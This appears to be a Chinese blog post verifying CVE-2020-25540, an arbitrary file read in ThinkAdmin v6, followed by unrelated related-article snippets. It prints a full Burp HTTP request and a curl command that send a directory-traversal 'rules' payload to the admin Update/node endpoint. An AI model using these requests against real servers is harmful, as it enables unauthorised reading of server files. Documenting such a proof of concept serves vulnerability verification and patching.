Thinkadmin v6爆高危漏洞!
Thinkadmin v6任意文件读取漏洞(CVE-2020-25540)漏洞验证
先使用了burp,发现回不来
POST /admin.html?s=admin/api.Update/node HTTP/1.1
Host: xxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Content-Length: 28rules=%5b%22..%2f..%2f%22%5d
使用curl去返回数据包,也无
curl https://xxxxx/admin.html?s=admin/api.Update/node -X POST -d 'rules=%5B%22.%2F%22%5D'
最后用了浏览器
Thinkadmin v6爆高危漏洞!相关推荐
- 以太坊再爆高危漏洞!黑客增发ATN 1100万枚token事件始末
以太坊再爆高危漏洞!黑客增发ATN 1100万枚token事件始末 编者按:5月11日,ATN Token遭受恶意攻击,攻击者利用DSAuth库与ERC223搭配使用具有的混合漏洞,窃取了ATN的所有 ...
- 小心!智能合约再爆高危漏洞,两大加密货币直接变废纸!
小心!智能合约再爆高危漏洞,两大加密货币直接变废纸! 大家都还记得,前一段时间发生的BEC智能合约的安全漏洞问题.近日,智能合约安全问题再次上演,火币Pro发布公告,暂停EDU冲提币业务,随后EDU智 ...
- Android 爆高危漏洞,华为小米皆中招;第三代苹果 AirPods 来了;SQLite 3.30.0 发布 | 极客头条...
快来收听极客头条音频版吧,智能播报由标贝科技提供技术支持. 「CSDN 极客头条」,是从 CSDN 网站延伸至官方微信公众号的特别栏目,专注于一天业界事报道.风里雨里,我们将每天为朋友们,播报最新鲜有 ...
- 【黑鸟安全预警与每日资源】S2-048!Struts2 再爆高危漏洞!
[黑鸟安全预警]S2-048!Struts2 再爆高危漏洞!目前POC已公开,请各单位检查自己的应用是否有使用了Struts2 Struts1的插件!若使用了该插件会导致不受信任的输入传入到 Acti ...
- 突发!Spring Cloud 爆高危漏洞。。赶紧修复!!
Spring Cloud 突发漏洞 Log4j2 的核弹级漏洞刚告一段落,Spring Cloud Gateway 又突发高危漏洞,又得折腾了... 2022年3月1日,Spring官方发布了关于Sp ...
- Spring Cloud 爆高危漏洞!!!
今日推荐 最适合晚上睡不着看的 8 个网站,建议收藏哦 23 种设计模式的通俗解释,虽然有点污,但是秒懂请立即卸载这款 IDEA 插件!SQL自动检查神器,再也不用担心SQL出错了,自动补全.回滚等功 ...
- Struts 2再爆高危漏洞CVE-2017-5638 绿盟科技发布免费扫描工具及产品升级包
Apache Structs2的Jakarta Multipart parser插件存在远程代码执行漏洞,漏洞编号为CVE-2017-5638.cwiki.apache.org公告了这个信息. 绿盟科 ...
- 微软服务器最大漏洞,微软又爆高危漏洞,小心电脑被远程控制!
[漏洞说明] 2020年3月12日,微软安全中心在3月份例行安全更新之后,单独发布Windows SMBv3 客户端/服务器远程代码执行漏洞(CVE-2020-0796)补丁程序,公告指出该漏洞存在于 ...
- 博览安全圈:360曝Office高危漏洞 微软及时修复
为了响应国家号召,加强全民网络安全意识,我们会经常性的为大家奉上最具代表性的安全事件. 1.360曝光Office高危漏洞 微软及时发布安全更新 近日,360称发现了Office的高危漏洞(CVE-2 ...
最新文章
- echo等追加到文件末尾
- mysql 平均日营业额_一条SQL语句中算日销售额和月销售额
- mysql now str,数据库学习之MySQL (十)—— 日期和时间函数 NOW STR_TO_DATE DATE_FORMAT 流程控制函数 IF IFNULL CASE...
- html标签之img,input标签
- 计组之存储系统:7、Cache替换算法(随机算法RAND、先进先出算法FIFO、近期最少使用LRU、最近不经常使用LFU)
- 使用Android OpenGL ES 2.0绘图之三:绘制形状
- iphone app开发实战很重要:《iPhone App开发实战手册》读后感
- Oracle认证/维保技术支持服务找重庆思庄
- Win10如何彻底删除360的办法
- 056 CSRF跨站请求伪造
- 北航计算机组成原理课程设计-2021秋 PreProject-MIPS-入门简介
- Java Web实训项目:西蒙购物网1
- Centos7 搭建 Svn+ReviewBoard
- 什么是TensorFlow
- win7计算机内存占用高,win7降低电脑内存占用过高的方法
- MYSQL 列转行方法
- 王选: 从Dijkstra谈帅才的洞察力
- 造梦师的梦想是什么样的?
- RT-Thread驱动——RTC PCF8563
- Android中的指纹识别